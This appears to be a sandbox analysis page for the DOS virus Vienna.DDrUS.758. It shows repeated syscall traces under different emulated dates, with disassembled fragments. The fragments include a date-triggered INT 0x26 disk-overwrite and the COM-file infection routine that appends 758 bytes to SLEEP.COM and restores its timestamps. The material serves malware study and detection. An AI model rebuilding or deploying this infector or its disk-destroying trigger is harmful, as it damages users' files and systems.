Sample viewer

vx.netlux.org/Virus.DOS.Vienna.DDrUS.758

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:07:22.230052331Z 48 PC: 12c59 | Get DOS version
2018-12-17T22:07:22.232177387Z 47 PC: 12c65 | Get disk transfer address
2018-12-17T22:07:22.23373585Z 26 PC: 12c78 | Set disk transfer address
2018-12-17T22:07:22.235704328Z 42 PC: 12c88 | Get date 0x12c88: cmp cx, 0x7c6
0x12c8c: jge 0x12c91
0x12c8e: jmp 0x12cbc
0x12c90: nop
0x12c91: mov ah, 0x2a
0x12c93: int 0x21
0x12c95: cmp dh, 6
0x12c98: jge 0x12c9d
0x12c9a: jmp 0x12cbc
0x12c9c: nop
0x12c9d: mov ah, 0x2a
0x12c9f: int 0x21
0x12ca1: cmp dl, 0x16
0x12ca4: jge 0x12ca9
0x12ca6: jmp 0x12cbc
0x12ca8: nop
0x12ca9: mov al, 2
0x12cab: mov cx, 0x64
0x12cae: mov dx, 0
0x12cb1: mov ds, word ptr [di + 0x37]
2018-12-17T22:07:22.238912766Z 42 PC: 12c95 | Get date 0x12c95: cmp dh, 6
0x12c98: jge 0x12c9d
0x12c9a: jmp 0x12cbc
0x12c9c: nop
0x12c9d: mov ah, 0x2a
0x12c9f: int 0x21
0x12ca1: cmp dl, 0x16
0x12ca4: jge 0x12ca9
0x12ca6: jmp 0x12cbc
0x12ca8: nop
0x12ca9: mov al, 2
0x12cab: mov cx, 0x64
0x12cae: mov dx, 0
0x12cb1: mov ds, word ptr [di + 0x37]
0x12cb4: mov bx, word ptr [di + 0x63]
0x12cb7: int 0x26
0x12cb9: jmp 0x12cbc
0x12cbb: nop
0x12cbc: pop si
0x12cbd: push si
2018-12-17T22:07:22.241474178Z 42 PC: 12ca1 | Get date 0x12ca1: cmp dl, 0x16
0x12ca4: jge 0x12ca9
0x12ca6: jmp 0x12cbc
0x12ca8: nop
0x12ca9: mov al, 2
0x12cab: mov cx, 0x64
0x12cae: mov dx, 0
0x12cb1: mov ds, word ptr [di + 0x37]
0x12cb4: mov bx, word ptr [di + 0x63]
0x12cb7: int 0x26
0x12cb9: jmp 0x12cbc
0x12cbb: nop
0x12cbc: pop si
0x12cbd: push si
0x12cbe: add si, 0x31
0x12cc2: lodsb al, byte ptr [si]
0x12cc3: mov cx, 0x8000
0x12cc6: repne scasb al, byte ptr es:[di]
0x12cc8: mov cx, 4
0x12ccb: lodsb al, byte ptr [si]
2018-12-17T22:07:22.244129976Z 78 PC: 12d3f | Find first file
2018-12-17T22:07:22.251467909Z 67 PC: 12d7d | Get or set file attributes
2018-12-17T22:07:22.257134889Z 67 PC: 12d8f | Get or set file attributes
2018-12-17T22:07:22.276432938Z 61 PC: 12d9a | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:07:22.28777976Z 87 PC: 12da6 | Get or set file date and time
2018-12-17T22:07:22.29254768Z 44 PC: 12db2 | Get time 0x12db2: and dh, 7
0x12db5: jmp 0x12db8
0x12db7: nop
0x12db8: mov ah, 0x3f
0x12dba: mov cx, 3
0x12dbd: mov dx, 0x21
0x12dc0: nop
0x12dc1: add dx, si
0x12dc3: int 0x21
0x12dc5: jb 0x12e1c
0x12dc7: cmp ax, 3
0x12dca: jne 0x12e1c
0x12dcc: mov ax, 0x4202
0x12dcf: mov cx, 0
0x12dd2: mov dx, 0
0x12dd5: int 0x21
0x12dd7: jb 0x12e1c
0x12dd9: mov cx, ax
0x12ddb: sub ax, 3
0x12dde: mov word ptr [si + 0x25], ax
2018-12-17T22:07:22.294594488Z 63 PC: 12dc5 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:07:22.300724505Z 66 PC: 12dd7 | Move file pointer
2018-12-17T22:07:22.302808302Z 64 PC: 12dfb | Write file or device (Write 758 bytes on handle 5)
2018-12-17T22:07:22.313601383Z 66 PC: 12e0d | Move file pointer
2018-12-17T22:07:22.31467981Z 64 PC: 12e1c | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:07:22.323350869Z 87 PC: 12e2f | Get or set file date and time
2018-12-17T22:07:22.324581255Z 62 PC: 12e33 | Close file
2018-12-17T22:07:22.332217414Z 67 PC: 12e42 | Get or set file attributes
2018-12-17T22:07:22.346992926Z 26 PC: 12e4f | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":1940,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:44:35.098371717Z 48 PC: 12c59 | Get DOS version
2018-12-25T11:44:35.10054323Z 47 PC: 12c65 | Get disk transfer address
2018-12-25T11:44:35.102312083Z 26 PC: 12c78 | Set disk transfer address
2018-12-25T11:44:35.10351428Z 42 PC: 12c88 | Get date 0x12c88: cmp cx, 0x7c6
0x12c8c: jge 0x12c91
0x12c8e: jmp 0x12cbc
0x12c90: nop
0x12c91: mov ah, 0x2a
0x12c93: int 0x21
0x12c95: cmp dh, 6
0x12c98: jge 0x12c9d
0x12c9a: jmp 0x12cbc
0x12c9c: nop
0x12c9d: mov ah, 0x2a
0x12c9f: int 0x21
0x12ca1: cmp dl, 0x16
0x12ca4: jge 0x12ca9
0x12ca6: jmp 0x12cbc
0x12ca8: nop
0x12ca9: mov al, 2
0x12cab: mov cx, 0x64
0x12cae: mov dx, 0
0x12cb1: mov ds, word ptr [di + 0x37]
2018-12-25T11:44:35.106088721Z 78 PC: 12d3f | Find first file
2018-12-25T11:44:35.112992978Z 67 PC: 12d7d | Get or set file attributes
2018-12-25T11:44:35.118454228Z 67 PC: 12d8f | Get or set file attributes
2018-12-25T11:44:35.134618166Z 61 PC: 12d9a | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:44:35.141402579Z 87 PC: 12da6 | Get or set file date and time
2018-12-25T11:44:35.142651735Z 44 PC: 12db2 | Get time 0x12db2: and dh, 7
0x12db5: jmp 0x12db8
0x12db7: nop
0x12db8: mov ah, 0x3f
0x12dba: mov cx, 3
0x12dbd: mov dx, 0x21
0x12dc0: nop
0x12dc1: add dx, si
0x12dc3: int 0x21
0x12dc5: jb 0x12e1c
0x12dc7: cmp ax, 3
0x12dca: jne 0x12e1c
0x12dcc: mov ax, 0x4202
0x12dcf: mov cx, 0
0x12dd2: mov dx, 0
0x12dd5: int 0x21
0x12dd7: jb 0x12e1c
0x12dd9: mov cx, ax
0x12ddb: sub ax, 3
0x12dde: mov word ptr [si + 0x25], ax
2018-12-25T11:44:35.14480114Z 63 PC: 12dc5 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:44:35.16579733Z 66 PC: 12dd7 | Move file pointer
2018-12-25T11:44:35.167235139Z 64 PC: 12dfb | Write file or device (Write 758 bytes on handle 5)
2018-12-25T11:44:35.175574914Z 66 PC: 12e0d | Move file pointer
2018-12-25T11:44:35.177675404Z 64 PC: 12e1c | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:44:35.184093487Z 87 PC: 12e2f | Get or set file date and time
2018-12-25T11:44:35.18543975Z 62 PC: 12e33 | Close file
2018-12-25T11:44:35.194384519Z 67 PC: 12e42 | Get or set file attributes
2018-12-25T11:44:35.204045955Z 26 PC: 12e4f | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1990,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":1940,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:44:35.172663329Z 48 PC: 12c59 | Get DOS version
2018-12-25T11:44:35.174419887Z 47 PC: 12c65 | Get disk transfer address
2018-12-25T11:44:35.175763356Z 26 PC: 12c78 | Set disk transfer address
2018-12-25T11:44:35.176956102Z 42 PC: 12c88 | Get date 0x12c88: cmp cx, 0x7c6
0x12c8c: jge 0x12c91
0x12c8e: jmp 0x12cbc
0x12c90: nop
0x12c91: mov ah, 0x2a
0x12c93: int 0x21
0x12c95: cmp dh, 6
0x12c98: jge 0x12c9d
0x12c9a: jmp 0x12cbc
0x12c9c: nop
0x12c9d: mov ah, 0x2a
0x12c9f: int 0x21
0x12ca1: cmp dl, 0x16
0x12ca4: jge 0x12ca9
0x12ca6: jmp 0x12cbc
0x12ca8: nop
0x12ca9: mov al, 2
0x12cab: mov cx, 0x64
0x12cae: mov dx, 0
0x12cb1: mov ds, word ptr [di + 0x37]
2018-12-25T11:44:35.179503664Z 42 PC: 12c95 | Get date 0x12c95: cmp dh, 6
0x12c98: jge 0x12c9d
0x12c9a: jmp 0x12cbc
0x12c9c: nop
0x12c9d: mov ah, 0x2a
0x12c9f: int 0x21
0x12ca1: cmp dl, 0x16
0x12ca4: jge 0x12ca9
0x12ca6: jmp 0x12cbc
0x12ca8: nop
0x12ca9: mov al, 2
0x12cab: mov cx, 0x64
0x12cae: mov dx, 0
0x12cb1: mov ds, word ptr [di + 0x37]
0x12cb4: mov bx, word ptr [di + 0x63]
0x12cb7: int 0x26
0x12cb9: jmp 0x12cbc
0x12cbb: nop
0x12cbc: pop si
0x12cbd: push si
2018-12-25T11:44:35.181985481Z 78 PC: 12d3f | Find first file
2018-12-25T11:44:35.188877838Z 67 PC: 12d7d | Get or set file attributes
2018-12-25T11:44:35.195240636Z 67 PC: 12d8f | Get or set file attributes
2018-12-25T11:44:35.227508414Z 61 PC: 12d9a | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:44:35.234901733Z 87 PC: 12da6 | Get or set file date and time
2018-12-25T11:44:35.236418435Z 44 PC: 12db2 | Get time 0x12db2: and dh, 7
0x12db5: jmp 0x12db8
0x12db7: nop
0x12db8: mov ah, 0x3f
0x12dba: mov cx, 3
0x12dbd: mov dx, 0x21
0x12dc0: nop
0x12dc1: add dx, si
0x12dc3: int 0x21
0x12dc5: jb 0x12e1c
0x12dc7: cmp ax, 3
0x12dca: jne 0x12e1c
0x12dcc: mov ax, 0x4202
0x12dcf: mov cx, 0
0x12dd2: mov dx, 0
0x12dd5: int 0x21
0x12dd7: jb 0x12e1c
0x12dd9: mov cx, ax
0x12ddb: sub ax, 3
0x12dde: mov word ptr [si + 0x25], ax
2018-12-25T11:44:35.241766814Z 63 PC: 12dc5 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:44:35.249823113Z 66 PC: 12dd7 | Move file pointer
2018-12-25T11:44:35.258981205Z 64 PC: 12dfb | Write file or device (Write 758 bytes on handle 5)
2018-12-25T11:44:35.269559643Z 66 PC: 12e0d | Move file pointer
2018-12-25T11:44:35.271053549Z 64 PC: 12e1c | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:44:35.278260502Z 87 PC: 12e2f | Get or set file date and time
2018-12-25T11:44:35.280836302Z 62 PC: 12e33 | Close file
2018-12-25T11:44:35.289665199Z 67 PC: 12e42 | Get or set file attributes
2018-12-25T11:44:35.301152701Z 26 PC: 12e4f | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":1940,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:44:35.654339142Z 48 PC: 12c59 | Get DOS version
2018-12-25T11:44:35.656841262Z 47 PC: 12c65 | Get disk transfer address
2018-12-25T11:44:35.658159788Z 26 PC: 12c78 | Set disk transfer address
2018-12-25T11:44:35.659466623Z 42 PC: 12c88 | Get date 0x12c88: cmp cx, 0x7c6
0x12c8c: jge 0x12c91
0x12c8e: jmp 0x12cbc
0x12c90: nop
0x12c91: mov ah, 0x2a
0x12c93: int 0x21
0x12c95: cmp dh, 6
0x12c98: jge 0x12c9d
0x12c9a: jmp 0x12cbc
0x12c9c: nop
0x12c9d: mov ah, 0x2a
0x12c9f: int 0x21
0x12ca1: cmp dl, 0x16
0x12ca4: jge 0x12ca9
0x12ca6: jmp 0x12cbc
0x12ca8: nop
0x12ca9: mov al, 2
0x12cab: mov cx, 0x64
0x12cae: mov dx, 0
0x12cb1: mov ds, word ptr [di + 0x37]
2018-12-25T11:44:35.662665629Z 78 PC: 12d3f | Find first file
2018-12-25T11:44:35.66851314Z 67 PC: 12d7d | Get or set file attributes
2018-12-25T11:44:35.673942364Z 67 PC: 12d8f | Get or set file attributes
2018-12-25T11:44:35.692944513Z 61 PC: 12d9a | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:44:35.699553051Z 87 PC: 12da6 | Get or set file date and time
2018-12-25T11:44:35.700893712Z 44 PC: 12db2 | Get time 0x12db2: and dh, 7
0x12db5: jmp 0x12db8
0x12db7: nop
0x12db8: mov ah, 0x3f
0x12dba: mov cx, 3
0x12dbd: mov dx, 0x21
0x12dc0: nop
0x12dc1: add dx, si
0x12dc3: int 0x21
0x12dc5: jb 0x12e1c
0x12dc7: cmp ax, 3
0x12dca: jne 0x12e1c
0x12dcc: mov ax, 0x4202
0x12dcf: mov cx, 0
0x12dd2: mov dx, 0
0x12dd5: int 0x21
0x12dd7: jb 0x12e1c
0x12dd9: mov cx, ax
0x12ddb: sub ax, 3
0x12dde: mov word ptr [si + 0x25], ax
2018-12-25T11:44:35.702875316Z 63 PC: 12dc5 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:44:35.70915962Z 66 PC: 12dd7 | Move file pointer
2018-12-25T11:44:35.710385325Z 64 PC: 12dfb | Write file or device (Write 758 bytes on handle 5)
2018-12-25T11:44:35.71852896Z 66 PC: 12e0d | Move file pointer
2018-12-25T11:44:35.722717133Z 64 PC: 12e1c | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:44:35.729542081Z 87 PC: 12e2f | Get or set file date and time
2018-12-25T11:44:35.731053422Z 62 PC: 12e33 | Close file
2018-12-25T11:44:35.739177894Z 67 PC: 12e42 | Get or set file attributes
2018-12-25T11:44:35.748765347Z 26 PC: 12e4f | Set disk transfer address

{"DateBased":true,"Day":1,"Month":6,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":1940,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:44:35.650955967Z 48 PC: 12c59 | Get DOS version
2018-12-25T11:44:35.653831347Z 47 PC: 12c65 | Get disk transfer address
2018-12-25T11:44:35.655222821Z 26 PC: 12c78 | Set disk transfer address
2018-12-25T11:44:35.65687251Z 42 PC: 12c88 | Get date 0x12c88: cmp cx, 0x7c6
0x12c8c: jge 0x12c91
0x12c8e: jmp 0x12cbc
0x12c90: nop
0x12c91: mov ah, 0x2a
0x12c93: int 0x21
0x12c95: cmp dh, 6
0x12c98: jge 0x12c9d
0x12c9a: jmp 0x12cbc
0x12c9c: nop
0x12c9d: mov ah, 0x2a
0x12c9f: int 0x21
0x12ca1: cmp dl, 0x16
0x12ca4: jge 0x12ca9
0x12ca6: jmp 0x12cbc
0x12ca8: nop
0x12ca9: mov al, 2
0x12cab: mov cx, 0x64
0x12cae: mov dx, 0
0x12cb1: mov ds, word ptr [di + 0x37]
2018-12-25T11:44:35.659814688Z 78 PC: 12d3f | Find first file
2018-12-25T11:44:35.671645236Z 67 PC: 12d7d | Get or set file attributes
2018-12-25T11:44:35.678330616Z 67 PC: 12d8f | Get or set file attributes
2018-12-25T11:44:35.699860779Z 61 PC: 12d9a | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:44:35.706867978Z 87 PC: 12da6 | Get or set file date and time
2018-12-25T11:44:35.736341079Z 44 PC: 12db2 | Get time 0x12db2: and dh, 7
0x12db5: jmp 0x12db8
0x12db7: nop
0x12db8: mov ah, 0x3f
0x12dba: mov cx, 3
0x12dbd: mov dx, 0x21
0x12dc0: nop
0x12dc1: add dx, si
0x12dc3: int 0x21
0x12dc5: jb 0x12e1c
0x12dc7: cmp ax, 3
0x12dca: jne 0x12e1c
0x12dcc: mov ax, 0x4202
0x12dcf: mov cx, 0
0x12dd2: mov dx, 0
0x12dd5: int 0x21
0x12dd7: jb 0x12e1c
0x12dd9: mov cx, ax
0x12ddb: sub ax, 3
0x12dde: mov word ptr [si + 0x25], ax
2018-12-25T11:44:35.7392519Z 63 PC: 12dc5 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:44:35.772336239Z 66 PC: 12dd7 | Move file pointer
2018-12-25T11:44:35.773935762Z 64 PC: 12dfb | Write file or device (Write 758 bytes on handle 5)
2018-12-25T11:44:35.78385872Z 66 PC: 12e0d | Move file pointer
2018-12-25T11:44:35.800221165Z 64 PC: 12e1c | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:44:35.80648099Z 87 PC: 12e2f | Get or set file date and time
2018-12-25T11:44:35.808404036Z 62 PC: 12e33 | Close file
2018-12-25T11:44:35.824284128Z 67 PC: 12e42 | Get or set file attributes
2018-12-25T11:44:35.83566275Z 26 PC: 12e4f | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":1940,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:44:35.6622901Z 48 PC: 12c59 | Get DOS version
2018-12-25T11:44:35.663629228Z 47 PC: 12c65 | Get disk transfer address
2018-12-25T11:44:35.66607355Z 26 PC: 12c78 | Set disk transfer address
2018-12-25T11:44:35.667286883Z 42 PC: 12c88 | Get date 0x12c88: cmp cx, 0x7c6
0x12c8c: jge 0x12c91
0x12c8e: jmp 0x12cbc
0x12c90: nop
0x12c91: mov ah, 0x2a
0x12c93: int 0x21
0x12c95: cmp dh, 6
0x12c98: jge 0x12c9d
0x12c9a: jmp 0x12cbc
0x12c9c: nop
0x12c9d: mov ah, 0x2a
0x12c9f: int 0x21
0x12ca1: cmp dl, 0x16
0x12ca4: jge 0x12ca9
0x12ca6: jmp 0x12cbc
0x12ca8: nop
0x12ca9: mov al, 2
0x12cab: mov cx, 0x64
0x12cae: mov dx, 0
0x12cb1: mov ds, word ptr [di + 0x37]
2018-12-25T11:44:35.669755808Z 78 PC: 12d3f | Find first file
2018-12-25T11:44:35.678044447Z 67 PC: 12d7d | Get or set file attributes
2018-12-25T11:44:35.685266752Z 67 PC: 12d8f | Get or set file attributes
2018-12-25T11:44:35.707732714Z 61 PC: 12d9a | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:44:35.717562099Z 87 PC: 12da6 | Get or set file date and time
2018-12-25T11:44:35.720135555Z 44 PC: 12db2 | Get time 0x12db2: and dh, 7
0x12db5: jmp 0x12db8
0x12db7: nop
0x12db8: mov ah, 0x3f
0x12dba: mov cx, 3
0x12dbd: mov dx, 0x21
0x12dc0: nop
0x12dc1: add dx, si
0x12dc3: int 0x21
0x12dc5: jb 0x12e1c
0x12dc7: cmp ax, 3
0x12dca: jne 0x12e1c
0x12dcc: mov ax, 0x4202
0x12dcf: mov cx, 0
0x12dd2: mov dx, 0
0x12dd5: int 0x21
0x12dd7: jb 0x12e1c
0x12dd9: mov cx, ax
0x12ddb: sub ax, 3
0x12dde: mov word ptr [si + 0x25], ax
2018-12-25T11:44:35.723086688Z 63 PC: 12dc5 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:44:35.734808813Z 66 PC: 12dd7 | Move file pointer
2018-12-25T11:44:35.737720372Z 64 PC: 12dfb | Write file or device (Write 758 bytes on handle 5)
2018-12-25T11:44:35.747597862Z 66 PC: 12e0d | Move file pointer
2018-12-25T11:44:35.749791843Z 64 PC: 12e1c | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:44:35.758982772Z 87 PC: 12e2f | Get or set file date and time
2018-12-25T11:44:35.761262518Z 62 PC: 12e33 | Close file
2018-12-25T11:44:35.770431325Z 67 PC: 12e42 | Get or set file attributes
2018-12-25T11:44:35.783388268Z 26 PC: 12e4f | Set disk transfer address

{"DateBased":true,"Day":22,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":1940,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:44:36.172947276Z 48 PC: 12c59 | Get DOS version
2018-12-25T11:44:36.175244426Z 47 PC: 12c65 | Get disk transfer address
2018-12-25T11:44:36.176232674Z 26 PC: 12c78 | Set disk transfer address
2018-12-25T11:44:36.177162448Z 42 PC: 12c88 | Get date 0x12c88: cmp cx, 0x7c6
0x12c8c: jge 0x12c91
0x12c8e: jmp 0x12cbc
0x12c90: nop
0x12c91: mov ah, 0x2a
0x12c93: int 0x21
0x12c95: cmp dh, 6
0x12c98: jge 0x12c9d
0x12c9a: jmp 0x12cbc
0x12c9c: nop
0x12c9d: mov ah, 0x2a
0x12c9f: int 0x21
0x12ca1: cmp dl, 0x16
0x12ca4: jge 0x12ca9
0x12ca6: jmp 0x12cbc
0x12ca8: nop
0x12ca9: mov al, 2
0x12cab: mov cx, 0x64
0x12cae: mov dx, 0
0x12cb1: mov ds, word ptr [di + 0x37]
2018-12-25T11:44:36.179913705Z 78 PC: 12d3f | Find first file
2018-12-25T11:44:36.185764424Z 67 PC: 12d7d | Get or set file attributes
2018-12-25T11:44:36.191089811Z 67 PC: 12d8f | Get or set file attributes
2018-12-25T11:44:36.209332219Z 61 PC: 12d9a | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:44:36.221195052Z 87 PC: 12da6 | Get or set file date and time
2018-12-25T11:44:36.222861794Z 44 PC: 12db2 | Get time 0x12db2: and dh, 7
0x12db5: jmp 0x12db8
0x12db7: nop
0x12db8: mov ah, 0x3f
0x12dba: mov cx, 3
0x12dbd: mov dx, 0x21
0x12dc0: nop
0x12dc1: add dx, si
0x12dc3: int 0x21
0x12dc5: jb 0x12e1c
0x12dc7: cmp ax, 3
0x12dca: jne 0x12e1c
0x12dcc: mov ax, 0x4202
0x12dcf: mov cx, 0
0x12dd2: mov dx, 0
0x12dd5: int 0x21
0x12dd7: jb 0x12e1c
0x12dd9: mov cx, ax
0x12ddb: sub ax, 3
0x12dde: mov word ptr [si + 0x25], ax
2018-12-25T11:44:36.225402603Z 63 PC: 12dc5 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:44:36.231882429Z 66 PC: 12dd7 | Move file pointer
2018-12-25T11:44:36.23313792Z 64 PC: 12dfb | Write file or device (Write 758 bytes on handle 5)
2018-12-25T11:44:36.241400904Z 66 PC: 12e0d | Move file pointer
2018-12-25T11:44:36.252109615Z 64 PC: 12e1c | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:44:36.258982069Z 87 PC: 12e2f | Get or set file date and time
2018-12-25T11:44:36.260470594Z 62 PC: 12e33 | Close file
2018-12-25T11:44:36.269772143Z 67 PC: 12e42 | Get or set file attributes
2018-12-25T11:44:36.280040794Z 26 PC: 12e4f | Set disk transfer address